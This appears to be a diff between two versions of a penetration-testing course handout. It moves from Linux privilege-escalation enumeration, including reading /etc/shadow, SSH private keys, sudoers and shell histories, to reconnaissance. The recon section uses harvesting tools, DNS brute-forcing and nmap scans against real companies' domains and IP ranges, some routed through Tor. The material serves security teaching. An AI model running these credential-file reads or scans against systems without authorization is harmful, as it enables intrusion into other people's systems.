1 | - | ############################## |
1 | + | ################################## |
2 | - | # Linux For InfoSec Pros # |
2 | + | # Scripting For InfoSec Pros # |
3 | - | # By Joe McCray # |
3 | + | # By Joe McCray # |
4 | - | ############################## |
4 | + | ################################## |
5 | ||
6 | - | Here is the download link for the video of the morning session: |
6 | + | |
7 | - | https://s3.amazonaws.com/StrategicSec-Videos/_2015_4_18_rec-lw-us-9_233534_recording.mp4 |
7 | + | |
8 | ########## | |
9 | - | Here is the download link for the video of the afternoon session: |
9 | + | |
10 | - | https://s3.amazonaws.com/StrategicSec-Videos/_2015_4_18_rec-lw-us-4_233632_recording.mp4 |
10 | + | |
11 | - Although you can get the VM to run in VirtualBox, I will not be supporting this configuration for this class. | |
12 | ||
13 | ||
14 | ########################## | |
15 | # Download the attack VM # | |
16 | ########################## | |
17 | - | - For this workshop you'll need the latest version of VMWare Workstation (Windows), Fusion (Mac), or Player. |
17 | + | https://s3.amazonaws.com/infosecaddictsvirtualmachines/InfoSecAddictsVM.zip |
18 | user: infosecaddicts | |
19 | - | - A 30-day trial of Workstation 11 can be downloaded from here: |
19 | + | pass: infosecaddicts |
20 | - | - https://my.vmware.com/web/vmware/info/slug/desktop_end_user_computing/vmware_workstation/11_0 |
20 | + | |
21 | ||
22 | - | - A 30-day trial of Fusion 7 can be downloaded from here: |
22 | + | |
23 | - | - https://my.vmware.com/web/vmware/info/slug/desktop_end_user_computing/vmware_fusion/7_0 |
23 | + | |
24 | ||
25 | - | - The newest version of VMWare Player can be downloaded from here: |
25 | + | |
26 | - | - https://my.vmware.com/web/vmware/free#desktop_end_user_computing/vmware_player/7_0 |
26 | + | |
27 | ######################################## | |
28 | # Boot up the StrategicSec Ubuntu host # | |
29 | # You can also boot up the Win7 as well# | |
30 | ######################################## | |
31 | ||
32 | - Log in to your Ubuntu host with the following credentials: | |
33 | user: strategicsec | |
34 | pass: strategicsec | |
35 | - | https://s3.amazonaws.com/StrategicSec-VMs/StrategicsecUbuntu14.zip |
35 | + | |
36 | - | user: strategicsec |
36 | + | |
37 | - | pass: strategicsec |
37 | + | |
38 | - I prefer to use Putty to SSH into my Ubuntu host on pentests and I'll be teaching this class in the same manner that I do pentests. | |
39 | - You can download Putty from here: | |
40 | - http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe | |
41 | ||
42 | ||
43 | - For the purpose of this workshop 192.168.230.128 is my Ubuntu IP address so anytime you see that IP you'll know that's my Ubuntu host | |
44 | ||
45 | ||
46 | Email Harvesting | |
47 | ---------------- | |
48 | ||
49 | cd ~/toolz/ | |
50 | ||
51 | rm -rf theharvester-read-only/ | |
52 | ||
53 | sudo apt install -y python-pyasn1 python-pyasn1-modules git vim nmap openssh-server proxychains git-core curl zlib1g-dev build-essential libssl-dev libreadline-dev libyaml-dev libsqlite3-dev sqlite3 libxml2-dev libxslt1-dev libcurl4-openssl-dev python-software-properties libffi-dev | |
54 | strategicsec | |
55 | ||
56 | pip install requests | |
57 | ||
58 | git clone https://github.com/laramies/theHarvester.git | |
59 | ||
60 | cd theHarvester/ | |
61 | ||
62 | python theHarvester.py | |
63 | ||
64 | python theHarvester.py -d motorola.com -l 50 -b google | |
65 | - | # Basic Linux Commands # |
65 | + | |
66 | python theHarvester.py -d motorola.com -l 50 -b bing | |
67 | ||
68 | - | pwd |
68 | + | python theHarvester.py -d motorola.com -l 50 -b linkedin |
69 | ||
70 | - | whereis pwd |
70 | + | python theHarvester.py -d motorola.com -l 50 -b pgp |
71 | ||
72 | - | which pwd |
72 | + | |
73 | ||
74 | - | sudo find / -name pwd |
74 | + | |
75 | ||
76 | - | /bin/pwd |
76 | + | File Meta-Data Harvesting |
77 | ------------------------- | |
78 | - | mkdir test |
78 | + | |
79 | ||
80 | - | cd test |
80 | + | sudo apt-get install -y python-pip |
81 | strategicsec | |
82 | - | touch one two three |
82 | + | |
83 | pip install --upgrade pip | |
84 | - | ls -l t (without pressing the Enter key, press the Tab key twice. What happens?) |
84 | + | |
85 | pip install google | |
86 | - | h (and again without pressing the Enter key, press the Tab key twice. What happens?) |
86 | + | |
87 | ||
88 | - | Press the 'Up arrow key' (What happens?) |
88 | + | git clone https://github.com/opsdisk/metagoofil.git |
89 | ||
90 | - | Press 'Ctrl-A' (What happens?) |
90 | + | cd metagoofil/ |
91 | ||
92 | ||
93 | python metagoofil.py -d motorola.com -t doc,pdf -l 100 -n 3 -o motorolafiles | |
94 | - | clear (What happens?) |
94 | + | |
95 | sudo apt install libimage-exiftool-perl | |
96 | - | echo one > one |
96 | + | |
97 | ||
98 | - | cat one (What happens?) |
98 | + | cd motorolafiles |
99 | ||
100 | - | man cat (What happens?) |
100 | + | exiftool -r *.doc | egrep -i "Author|Creator|Email|Producer|Template" | sort -u |
101 | - | q |
101 | + | |
102 | ||
103 | - | cat two |
103 | + | |
104 | python metagoofil.py -d [domain name] -t doc,pdf -l 100 -n 3 -o motorolafiles | |
105 | - | cat one > two |
105 | + | Whereas: |
106 | ||
107 | - | cat two |
107 | + | -d : I used another domain name aside from Google.com to make it work |
108 | -t : I asked for the program to search two types of public documents whuch are doc and pdf files | |
109 | - | cat one two > three |
109 | + | -l : I limited the search result to 100 to make the process faster |
110 | -n : I limited the downloads (files that are going to be downloaded to get their metadatas extracted) to only 3 to make the process faster | |
111 | - | cat three |
111 | + | -o : I directed the result of the compilation t motorolafiles, which is a file located inside the metagoofil directory (~/toolz/metagoofil/motorolafiles) |
112 | -f : Save the html links to html_links_<TIMESTAMP>.txt file | |
113 | - | echo four >> three |
113 | + | |
114 | ||
115 | - | cat three (What happens?) |
115 | + | |
116 | ||
117 | - | wc -l three |
117 | + | |
118 | ||
119 | - | man wc |
119 | + | Github Info Harvesting |
120 | - | q |
120 | + | ---------------------- |
121 | cd ~/toolz/ | |
122 | - | cat three | grep four |
122 | + | |
123 | sudo pip install gitem | |
124 | - | cat three | grep one |
124 | + | |
125 | ||
126 | - | man grep |
126 | + | |
127 | - | q |
127 | + | gitem organization facebook |
128 | ||
129 | ||
130 | - | sudo grep eth[01] /etc/* (What happens?) |
130 | + | gitem repository facebook react |
131 | ||
132 | - | cat /etc/iftab |
132 | + | |
133 | gitem --processes 4 user zpao | |
134 | ||
135 | - | man ps |
135 | + | You'll probably get a message that says "Your API requests are being rate-limited" |
136 | - | q |
136 | + | |
137 | ||
138 | - | ps |
138 | + | You can create an Oauth token using the link below: |
139 | Reference: | |
140 | - | ps aux |
140 | + | https://help.github.com/articles/creating-an-access-token-for-command-line-use/ |
141 | ||
142 | - | ps aux | less |
142 | + | |
143 | gitem -o 123f45672972c18ea0f42fc70bc8c5172b96d890 --processes 4 user zpao | |
144 | - | Press the 'Up arrow key' (What happens?) |
144 | + | You'll have to use your own Oauth token |
145 | ||
146 | - | Press the 'Down arrow key' (What happens?) |
146 | + | |
147 | - | q |
147 | + | |
148 | ||
149 | - | top |
149 | + | Network Topology Enumeration |
150 | ---------------------------- | |
151 | ||
152 | - | ######################################################################### |
152 | + | |
153 | - | # What kind of Linux am I on and how can I find out? # |
153 | + | |
154 | - | # Great reference: # |
154 | + | wget https://raw.githubusercontent.com/leonteale/pentestpackage/master/gxfr.py |
155 | - | # https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ # |
155 | + | |
156 | - | ######################################################################### |
156 | + | python gxfr.py --bxfr --dns-lookup -o |
157 | - | What’s the distribution type? What version? |
157 | + | motorola.com |
158 | - | ------------------------------------------- |
158 | + | [ press enter ] |
159 | - | cat /etc/issue |
159 | + | cw1kxyUgMdkECBNMb1fGqKJ9sC1lznaR20fPJeIt45Y= |
160 | - | cat /etc/*-release |
160 | + | |
161 | - | cat /etc/lsb-release # Debian based |
161 | + | |
162 | - | cat /etc/redhat-release # Redhat based |
162 | + | |
163 | ||
164 | cd ~/toolz/ | |
165 | ||
166 | - | What’s the kernel version? Is it 64-bit? |
166 | + | wget https://dl.packetstormsecurity.net/UNIX/scanners/blindcrawl.pl |
167 | - | ------------------------------------------- |
167 | + | |
168 | - | cat /proc/version |
168 | + | |
169 | - | uname -a |
169 | + | |
170 | - | uname -mrs |
170 | + | |
171 | - | rpm -q kernel |
171 | + | |
172 | - | dmesg | grep Linux |
172 | + | |
173 | - | ls /boot | grep vmlinuz- |
173 | + | |
174 | rm -rf fierce2/ | |
175 | ||
176 | git clone https://github.com/mschwager/fierce.git | |
177 | - | What can be learnt from the environmental variables? |
177 | + | |
178 | - | ---------------------------------------------------- |
178 | + | cd fierce |
179 | - | cat /etc/profile |
179 | + | |
180 | - | cat /etc/bashrc |
180 | + | sudo apt-get install -y python3-pip |
181 | - | cat ~/.bash_profile |
181 | + | strategicsec |
182 | - | cat ~/.bashrc |
182 | + | |
183 | - | cat ~/.bash_logout |
183 | + | sudo pip3 install -r requirements.txt |
184 | - | env |
184 | + | |
185 | - | set |
185 | + | python3 fierce.py -h |
186 | ||
187 | python3 fierce.py --domain motorola.com --subdomains accounts admin ads | |
188 | - | What services are running? Which service has which user privilege? |
188 | + | Traverse IPs near discovered domains to search for contiguous blocks with the --traverse flag: |
189 | - | ------------------------------------------------------------------ |
189 | + | |
190 | - | ps aux |
190 | + | python3 fierce.py --domain facebook.com --subdomains admin --traverse 10 |
191 | - | ps -ef |
191 | + | |
192 | - | top |
192 | + | |
193 | - | cat /etc/services |
193 | + | Limit nearby IP traversal to certain domains with the --search flag: |
194 | ||
195 | python3 fierce.py --domain facebook.com --subdomains admin --search fb.com fb.net | |
196 | - | Which service(s) are been running by root? Of these services, which are vulnerable - it’s worth a double check! |
196 | + | |
197 | - | --------------------------------------------------------------------------------------------------------------- |
197 | + | |
198 | - | ps aux | grep root |
198 | + | Attempt an HTTP connection on domains discovered with the --connect flag: |
199 | - | ps -ef | grep root |
199 | + | |
200 | python3 fierce.py --domain stackoverflow.com --subdomains mail --connect | |
201 | ||
202 | ||
203 | - | What applications are installed? What version are they? Are they currently running? |
203 | + | |
204 | - | ------------------------------------------------------------------------------------ |
204 | + | |
205 | - | ls -alh /usr/bin/ |
205 | + | |
206 | - | ls -alh /sbin/ |
206 | + | Another good way to find servers |
207 | - | dpkg -l |
207 | + | -------------------------------- |
208 | - | dpkg --get-selections | grep -v deinstall |
208 | + | |
209 | - | rpm -qa |
209 | + | |
210 | - | ls -alh /var/cache/apt/archives |
210 | + | wget --no-check-certificate https://raw.githubusercontent.com/BenDrysdale/ipcrawl/master/ipcrawl.c |
211 | - | ls -alh /var/cache/yum/ |
211 | + | |
212 | gcc ipcrawl.c -o ipcrawl | |
213 | ||
214 | - | Any of the service(s) settings misconfigured? Are any (vulnerable) plugins attached? |
214 | + | chmod 777 ipcrawl |
215 | - | ------------------------------------------------------------------------------------ |
215 | + | |
216 | - | cat /etc/syslog.conf |
216 | + | ./ipcrawl 148.87.1.1 148.87.1.254 (DNS forward lookup against an IP range) |
217 | - | cat /etc/chttp.conf |
217 | + | |
218 | - | cat /etc/lighttpd.conf |
218 | + | |
219 | - | cat /etc/cups/cupsd.conf |
219 | + | |
220 | - | cat /etc/inetd.conf |
220 | + | |
221 | - | cat /etc/apache2/apache2.conf |
221 | + | Check for Load Balancers |
222 | - | cat /etc/my.conf |
222 | + | |
223 | - | cat /etc/httpd/conf/httpd.conf |
223 | + | Here are some command-line options to use for identifying load balancers: |
224 | - | cat /opt/lampp/etc/httpd.conf |
224 | + | |
225 | - | ls -aRl /etc/ | awk '$1 ~ /^.*r.*/ |
225 | + | dig microsoft.com |
226 | ||
227 | cd ~/toolz | |
228 | wget https://raw.githubusercontent.com/craig/ge.mine.nu/master/lbd/lbd.sh | |
229 | - | What jobs are scheduled? |
229 | + | chmod +x lbd.sh |
230 | ./lbd.sh microsoft.com | |
231 | - | crontab -l |
231 | + | |
232 | - | ls -alh /var/spool/cron |
232 | + | |
233 | - | ls -al /etc/ | grep cron |
233 | + | git clone https://github.com/jmbr/halberd.git |
234 | - | ls -al /etc/cron* |
234 | + | cd halberd |
235 | - | cat /etc/cron* |
235 | + | |
236 | - | cat /etc/at.allow |
236 | + | |
237 | - | cat /etc/at.deny |
237 | + | |
238 | - | cat /etc/cron.allow |
238 | + | |
239 | - | cat /etc/cron.deny |
239 | + | |
240 | - | cat /etc/crontab |
240 | + | |
241 | - | cat /etc/anacrontab |
241 | + | |
242 | - | cat /var/spool/cron/crontabs/root |
242 | + | |
243 | Test for Web Application Firewalls (WAFs) | |
244 | ----------------------------------------- | |
245 | - | Any plain text usernames and/or passwords? |
245 | + | pip install wafw00f |
246 | - | ------------------------------------------ |
246 | + | |
247 | - | grep -i user [filename] |
247 | + | wafw00f http://strategicsec.com |
248 | - | grep -i pass [filename] |
248 | + | |
249 | - | grep -C 5 "password" [filename] |
249 | + | wafw00f http://oracle.com |
250 | - | find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password" # Search for Joomla passwords |
250 | + | |
251 | ||
252 | sudo nmap -p 80 --script http-waf-detect.nse strategicsec.com | |
253 | - | What NIC(s) does the system have? Is it connected to another network? |
253 | + | |
254 | - | --------------------------------------------------------------------- |
254 | + | |
255 | - | /sbin/ifconfig -a |
255 | + | |
256 | - | cat /etc/network/interfaces |
256 | + | |
257 | - | cat /etc/sysconfig/network |
257 | + | |
258 | ||
259 | ||
260 | - | What are the network configuration settings? What can you find out about this network? DHCP server? DNS server? Gateway? |
260 | + | |
261 | - | ------------------------------------------------------------------------------------------------------------------------ |
261 | + | |
262 | - | cat /etc/resolv.conf |
262 | + | |
263 | - | cat /etc/sysconfig/network |
263 | + | |
264 | - | cat /etc/networks |
264 | + | Recon-NG (Metasploit for Recon): |
265 | - | iptables -L |
265 | + | -------------------------------- |
266 | - | hostname |
266 | + | |
267 | - | dnsdomainname |
267 | + | |
268 | sudo apt-get install -y git python-pip python-dnspython python-mechanize python-slowaes python-xlsxwriter python-jsonrpclib python-lxml | |
269 | - | What other users & hosts are communicating with the system? |
269 | + | strategicsec |
270 | - | ----------------------------------------------------------- |
270 | + | |
271 | - | lsof -i |
271 | + | sudo pip install dicttoxml |
272 | - | lsof -i :80 |
272 | + | strategicsec |
273 | - | grep 80 /etc/services |
273 | + | |
274 | - | netstat -antup |
274 | + | |
275 | - | netstat -antpx |
275 | + | |
276 | - | netstat -tulpn |
276 | + | git clone https://LaNMaSteR53@bitbucket.org/LaNMaSteR53/recon-ng.git |
277 | - | chkconfig --list |
277 | + | cd recon-ng |
278 | - | chkconfig --list | grep 3:on |
278 | + | pip install PyPDF2 |
279 | - | last |
279 | + | sudo pip install olefile |
280 | - | w |
280 | + | strategicsec |
281 | ./recon-ng | |
282 | ||
283 | ||
284 | - | Whats cached? IP and/or MAC addresses |
284 | + | |
285 | At the prompt, let's type help in order to look at the commands we can use in Recon-ng. | |
286 | - | arp -e |
286 | + | |
287 | - | route |
287 | + | recon-ng > help |
288 | - | /sbin/route -nee |
288 | + | |
289 | ||
290 | Note that many of these commands are nearly identical to Metasploit including back, set, use, search, show, and unset. | |
291 | - | Who are you? Who is logged in? Who has been logged in? Who else is there? Who can do what? |
291 | + | |
292 | - | ------------------------------------------------------------------------------------------ |
292 | + | recon-ng > [ TAB ] [ TAB ] |
293 | - | id |
293 | + | |
294 | - | who |
294 | + | |
295 | - | w |
295 | + | |
296 | - | last |
296 | + | To see all the modules in Recon-ng, we can type: |
297 | - | cat /etc/passwd | cut -d: # List of users |
297 | + | |
298 | - | grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' # List of super users |
298 | + | recon-ng > show [ TAB ] [ TAB ] |
299 | - | awk -F: '($3 == "0") {print}' /etc/passwd # List of super users |
299 | + | |
300 | - | cat /etc/sudoers |
300 | + | |
301 | - | sudo -l |
301 | + | |
302 | Ok, let's drive this thing.... | |
303 | ||
304 | recon-ng > show banner | |
305 | - | What sensitive files can be found? |
305 | + | |
306 | - | ---------------------------------- |
306 | + | recon-ng > show companies |
307 | - | cat /etc/passwd |
307 | + | |
308 | - | cat /etc/group |
308 | + | recon-ng > show contacts |
309 | - | cat /etc/shadow |
309 | + | |
310 | - | ls -alh /var/mail/ |
310 | + | recon-ng > show credentials |
311 | ||
312 | recon-ng > show dashboard | |
313 | ||
314 | - | Anything “interesting” in the home directorie(s)? If it’s possible to access |
314 | + | recon-ng > show domains |
315 | - | ---------------------------------------------------------------------------- |
315 | + | |
316 | - | ls -ahlR /root/ |
316 | + | recon-ng > show hosts |
317 | - | ls -ahlR /home/ |
317 | + | |
318 | recon-ng > show keys | |
319 | ||
320 | - | Are there any passwords in; scripts, databases, configuration files or log files? Default paths and locations for passwords |
320 | + | recon-ng > show leaks |
321 | - | --------------------------------------------------------------------------------------------------------------------------- |
321 | + | |
322 | - | cat /var/apache2/config.inc |
322 | + | recon-ng > show locations |
323 | - | cat /var/lib/mysql/mysql/user.MYD |
323 | + | |
324 | - | cat /root/anaconda-ks.cfg |
324 | + | recon-ng > show modules |
325 | ||
326 | recon-ng > show netblocks | |
327 | - | What has the user being doing? Is there any password in plain text? What have they been edting? |
327 | + | |
328 | - | ----------------------------------------------------------------------------------------------- |
328 | + | recon-ng > show options |
329 | - | cat ~/.bash_history |
329 | + | |
330 | - | cat ~/.nano_history |
330 | + | recon-ng > show ports |
331 | - | cat ~/.atftp_history |
331 | + | |
332 | - | cat ~/.mysql_history |
332 | + | recon-ng > show profiles |
333 | - | cat ~/.php_history |
333 | + | |
334 | recon-ng > show pushpins | |
335 | ||
336 | recon-ng > show repositories | |
337 | - | What user information can be found? |
337 | + | |
338 | recon-ng > show schema | |
339 | - | cat ~/.bashrc |
339 | + | |
340 | - | cat ~/.profile |
340 | + | recon-ng > show vulnerabilities |
341 | - | cat /var/mail/root |
341 | + | |
342 | - | cat /var/spool/mail/root |
342 | + | recon-ng > show workspaces |
343 | ||
344 | ||
345 | - | Can private-key information be found? |
345 | + | |
346 | ||
347 | - | cat ~/.ssh/authorized_keys |
347 | + | |
348 | - | cat ~/.ssh/identity.pub |
348 | + | When you have found a module that you would like to try the process is fairly straight forward. |
349 | - | cat ~/.ssh/identity |
349 | + | |
350 | - | cat ~/.ssh/id_rsa.pub |
350 | + | Type, “use [Modulename]” to use the module |
351 | - | cat ~/.ssh/id_rsa |
351 | + | |
352 | - | cat ~/.ssh/id_dsa.pub |
352 | + | Type, “show info” to view information about the module |
353 | - | cat ~/.ssh/id_dsa |
353 | + | |
354 | - | cat /etc/ssh/ssh_config |
354 | + | And then, “show options” to see what variables can be set |
355 | - | cat /etc/ssh/sshd_config |
355 | + | |
356 | - | cat /etc/ssh/ssh_host_dsa_key.pub |
356 | + | Set the option variables with “set [variable]” |
357 | - | cat /etc/ssh/ssh_host_dsa_key |
357 | + | |
358 | - | cat /etc/ssh/ssh_host_rsa_key.pub |
358 | + | Finally, type “run” to execute the module |
359 | - | cat /etc/ssh/ssh_host_rsa_key |
359 | + | |
360 | - | cat /etc/ssh/ssh_host_key.pub |
360 | + | |
361 | - | cat /etc/ssh/ssh_host_key |
361 | + | ********************************** Begin Day 1 Homework Part 1 ********************************** |
362 | NOTE: Take screenshots of your performing all of the commands we've learned so far | |
363 | ||
364 | - | Any settings/files (hidden) on website? Any settings file with database information? |
364 | + | |
365 | - | ------------------------------------------------------------------------------------ |
365 | + | You must create a MS WORD document titled 'FirstName-LastName-Scripting-For-InfoSec-Day1-Basic-Linux-Pentest-Commands.docx' (ex: Joseph-McCray-Scripting-For-InfoSec-Day1-Basic-Linux-Pentest-Commands.docx). |
366 | - | ls -alhR /var/www/ |
366 | + | |
367 | - | ls -alhR /srv/www/htdocs/ |
367 | + | You must spell you name EXACTLY as you want it spelled on your class certificate. |
368 | - | ls -alhR /usr/local/www/apache22/data/ |
368 | + | |
369 | - | ls -alhR /opt/lampp/htdocs/ |
369 | + | IMPORTANT NOTE: |
370 | - | ls -alhR /var/www/html/ |
370 | + | Your homework must be submitted via email to both (joe@strategicsec.com and gayane@strategicsec.com) by Sunday January 29th at midnight EST. |
371 | ||
372 | ||
373 | - | Is there anything in the log file(s) (Could help with “Local File Includes”!) |
373 | + | ********************************** End Day 1 Homework Part 1 ********************************** |
374 | - | ----------------------------------------------------------------------------- |
374 | + | |
375 | - | cat /etc/httpd/logs/access_log |
375 | + | |
376 | - | cat /etc/httpd/logs/access.log |
376 | + | |
377 | - | cat /etc/httpd/logs/error_log |
377 | + | ********************************** Begin Day 1 Homework Part 2 ********************************** |
378 | - | cat /etc/httpd/logs/error.log |
378 | + | NOTE: THIS IS AN ABSOLUTE REQUIREMENT FOR YOUR CPE CREDITS |
379 | - | cat /var/log/apache2/access_log |
379 | + | |
380 | - | cat /var/log/apache2/access.log |
380 | + | |
381 | - | cat /var/log/apache2/error_log |
381 | + | You must take screenshots of the process of you registering at least 5 API keys, as well as screenshots of you using at least 10 Recon-NG modules against a target company. |
382 | - | cat /var/log/apache2/error.log |
382 | + | |
383 | - | cat /var/log/apache/access_log |
383 | + | |
384 | - | cat /var/log/apache/access.log |
384 | + | You must create a MS WORD document titled 'FirstName-LastName-Scripting-For-InfoSec-Day1-Recon-NG.docx' (ex: Joseph-McCray--Scripting-For-InfoSec-Day1-Recon-NG.docx). |
385 | - | cat /var/log/auth.log |
385 | + | |
386 | - | cat /var/log/chttp.log |
386 | + | You must spell you name EXACTLY as you want it spelled on your class certificate. |
387 | - | cat /var/log/cups/error_log |
387 | + | |
388 | - | cat /var/log/dpkg.log |
388 | + | |
389 | - | cat /var/log/faillog |
389 | + | Reference links: |
390 | - | cat /var/log/httpd/access_log |
390 | + | http://null-byte.wonderhowto.com/how-to/hack-like-pro-reconnaissance-with-recon-ng-part-1-getting-started-0169854/ |
391 | - | cat /var/log/httpd/access.log |
391 | + | http://resources.infosecinstitute.com/basic-updated-guide-to-recon-ng-plus-new-modules-rundown/ |
392 | - | cat /var/log/httpd/error_log |
392 | + | |
393 | - | cat /var/log/httpd/error.log |
393 | + | IMPORTANT NOTE: |
394 | - | cat /var/log/lastlog |
394 | + | Your homework must be submitted via email to both (joe@strategicsec.com and gayane@strategicsec.com) by Sunday January 29th at midnight EST |
395 | - | cat /var/log/lighttpd/access.log |
395 | + | |
396 | - | cat /var/log/lighttpd/error.log |
396 | + | ********************************** End Day 1 Homework Part 2 ********************************** |
397 | - | cat /var/log/lighttpd/lighttpd.access.log |
397 | + | |
398 | - | cat /var/log/lighttpd/lighttpd.error.log |
398 | + | |
399 | - | cat /var/log/messages |
399 | + | |
400 | - | cat /var/log/secure |
400 | + | |
401 | - | cat /var/log/syslog |
401 | + | |
402 | - | cat /var/log/wtmp |
402 | + | # Scanning Methodology # |
403 | - | cat /var/log/xferlog |
403 | + | |
404 | - | cat /var/log/yum.log |
404 | + | |
405 | - | cat /var/run/utmp |
405 | + | - Ping Sweep |
406 | - | cat /var/webmin/miniserv.log |
406 | + | What's alive? |
407 | - | cat /var/www/logs/access_log |
407 | + | ------------ |
408 | - | cat /var/www/logs/access.log |
408 | + | sudo nmap -sP 157.166.226.* |
409 | - | ls -alh /var/lib/dhcp3/ |
409 | + | |
410 | - | ls -alh /var/log/postgresql/ |
410 | + | |
411 | - | ls -alh /var/log/proftpd/ |
411 | + | -if -SP yields no results try: |
412 | - | ls -alh /var/log/samba/ |
412 | + | sudo nmap -sL 157.166.226.* |
413 | strategicsec | |
414 | - | Note: auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info, mail.log, mail.warn, messages, syslog, udev, wtmp |
414 | + | |
415 | - Port Scan | |
416 | What's where? | |
417 | - | ########################### |
417 | + | ------------ |
418 | - | # Target IP Determination # |
418 | + | sudo nmap -sS 162.243.126.247 |
419 | - | ########################### |
419 | + | |
420 | - | - This portion starts the actual workshop content |
420 | + | |
421 | - | - Zone Transfer fails on most domains, but here is an example of one that works: |
421 | + | |
422 | - | dig axfr heartinternet.co.uk @ns.heartinternet.co.uk |
422 | + | - Bannergrab/Version Query |
423 | What versions of software are running | |
424 | ------------------------------------- | |
425 | - | - Usually you will need to do a DNS brute-force with something like blindcrawl or fierce |
425 | + | sudo nmap -sV 162.243.126.247 |
426 | strategicsec | |
427 | - | Look up the IP addresses at: |
427 | + | |
428 | - | http://www.networksolutions.com/whois/index.jsp |
428 | + | |
429 | - Vulnerability Research | |
430 | Lookup the banner versions for public exploits | |
431 | - | - Note: If you are on a different machine and need to download blindcrawl can you download it this way: |
431 | + | ---------------------------------------------- |
432 | - | wget dl.packetstormsecurity.net/UNIX/scanners/blindcrawl.pl |
432 | + | http://exploit-db.com |
433 | http://securityfocus.com/bid | |
434 | https://packetstormsecurity.com/files/tags/exploit/ | |
435 | ||
436 | ||
437 | - | cd ~/toolz/fierce2 |
437 | + | |
438 | - | sudo apt-get install -y cpanminus cpan-listchanges cpanoutdated libappconfig-perl libyaml-appconfig-perl libnetaddr-ip-perl libnet-cidr-perl vim subversion |
438 | + | ####################################################### |
439 | - | strategicsec |
439 | + | # Day 1: 3rd Party Scanning, and scanning via proxies # |
440 | ####################################################### | |
441 | ||
442 | - | - Note: Only run this 'svn co' command below if you are NOT on the strategicsec VM: |
442 | + | https://www.shodan.io/ |
443 | - | svn co https://svn.assembla.com/svn/fierce/fierce2/trunk/ fierce2/ |
443 | + | |
444 | Create a FREE account and login | |
445 | ||
446 | - | cd ~/toolz/fierce2 |
446 | + | net:129.188.8.0/24 |
447 | - | wget http://search.cpan.org/CPAN/authors/id/A/AB/ABW/Template-Toolkit-2.14.tar.gz |
447 | + | |
448 | - | tar -zxvf Template-Toolkit-2.14.tar.gz |
448 | + | |
449 | - | cd Template-Toolkit-2.14/ |
449 | + | |
450 | - | perl Makefile.PL |
450 | + | cd /home/strategicsec/toolz/ |
451 | - | y |
451 | + | perl proxyfinder-0.3.pl multiproxy 3 proxies.txt <-- This takes a long time to run |
452 | - | y |
452 | + | |
453 | - | n |
453 | + | |
454 | - | y |
454 | + | |
455 | sudo vi /etc/proxychains.conf <--- Make sure that last line of the file is: socks4 127.0.0.1 9050 | |
456 | strategicsec | |
457 | ||
458 | ||
459 | ||
460 | - | sudo bash install.sh |
460 | + | |
461 | ---------------------------------------------------------------------- | |
462 | vi ~/toolz/fix-proxychains-dns.sh | |
463 | - | ./fierce |
463 | + | |
464 | #!/bin/bash | |
465 | - | ./fierce -dns motorola.com |
465 | + | # This script is called by proxychains to resolve DNS names |
466 | # DNS server used to resolve names | |
467 | # Reference: http://carnal0wnage.attackresearch.com/2013/09/changing-proxychains-hardcoded-dns.html | |
468 | DNS_SERVER=4.2.2.2 | |
469 | - | - Note: Only run these 'wget, gcc, chmod' commands below if you are NOT on the strategicsec VM: |
469 | + | |
470 | - | wget https://raw.githubusercontent.com/BenDrysdale/ipcrawl/master/ipcrawl.c |
470 | + | if [ $# = 0 ] ; then |
471 | - | gcc -o ipcrawl ipcrawl.c |
471 | + | echo " usage:" |
472 | - | chmod +x ipcrawl |
472 | + | echo " proxyresolv <hostname> " |
473 | exit | |
474 | fi | |
475 | ||
476 | - | - Here we do a forward lookup against an entire IP range. Basically take every IP in the range and see what it's hostname is |
476 | + | export LD_PRELOAD=libproxychains.so.3 |
477 | dig $1 @$DNS_SERVER +tcp | awk '/A.+[0-9]+\.[0-9]+\.[0-9]/{print $5;}' | |
478 | - | ./ipcrawl 148.87.1.1 148.87.1.254 (DNS forward lookup against an IP range) |
478 | + | ----------------------------------------------------------------------- |
479 | ||
480 | ||
481 | - | sudo nmap -sL 148.87.1.0-255 |
481 | + | sudo ntpdate pool.ntp.org |
482 | strategicsec | |
483 | ||
484 | - | sudo nmap -sL 148.87.1.0-255 | grep oracle |
484 | + | tor-resolve strategicsec.com |
485 | ||
486 | proxychains nmap -sT -p80 162.243.126.247 | |
487 | - | - Reference: http://blog.depthsecurity.com/2012/01/obtaining-hostdomain-names-through-ssl.html |
487 | + | |
488 | - | sudo nmap -p 443,444,8443,8080,8088 --script=ssl-cert --open 144.189.100.1-254 |
488 | + | proxychains nmap -sT -PN -n -sV -p 21,22,23,25,80,110,139,443,445,1433,1521,3306,3389,8080,10000 162.243.126.247 |
489 | ||
490 | - | |
490 | + | |
491 | ||
492 | ||
493 | ||
494 | - | ########################### |
494 | + | |
495 | - | # Load Balancer Detection # |
495 | + | |
496 | - | ########################### |
496 | + | |
497 | # Playing with Nmap NSE # | |
498 | - | - Here are some options to use for identifying load balancers: |
498 | + | |
499 | - | - http://toolbar.netcraft.com/site_report/ |
499 | + | |
500 | - | - Firefox LiveHTTP Headers |
500 | + | nmap -Pn -p80 --script ip-geolocation-* strategicsec.com |
501 | ||
502 | nmap -p80 --script dns-brute strategicsec.com | |
503 | - | - Here are some command-line options to use for identifying load balancers: |
503 | + | |
504 | nmap --script http-robtex-reverse-ip secore.info | |
505 | - | dig google.com |
505 | + | |
506 | nmap -Pn -p80 --script=http-headers strategicsec.com | |
507 | ||
508 | - | ./lbd-0.1.sh google.com |
508 | + | |
509 | ls /usr/share/nmap/scripts | grep http | |
510 | nmap -Pn -p80 --script=http-* strategicsec.com | |
511 | ||
512 | ||
513 | ||
514 | ######################### | |
515 | # Playing with Nmap NSE # | |
516 | ######################### | |
517 | ||
518 | nmap -Pn -p80 --script ip-geolocation-* strategicsec.com | |
519 | ||
520 | - | # Web Application Firewall Detection # |
520 | + | |
521 | ||
522 | nmap --script http-robtex-reverse-ip secore.info | |
523 | - | cd ~/toolz/wafw00f |
523 | + | |
524 | - | python wafw00f.py http://www.oracle.com |
524 | + | |
525 | - | python wafw00f.py http://www.strategicsec.com |
525 | + | |
526 | ||
527 | ls /usr/share/nmap/scripts | grep http | |
528 | nmap -Pn -p80 --script=http-* strategicsec.com | |
529 | ||
530 | ############ | |
531 | # Nmap NSE # | |
532 | - | sudo nmap -p 80 --script http-waf-detect.nse healthcare.gov |
532 | + | |
533 | ||
534 | - Reference for this tutorial is: | |
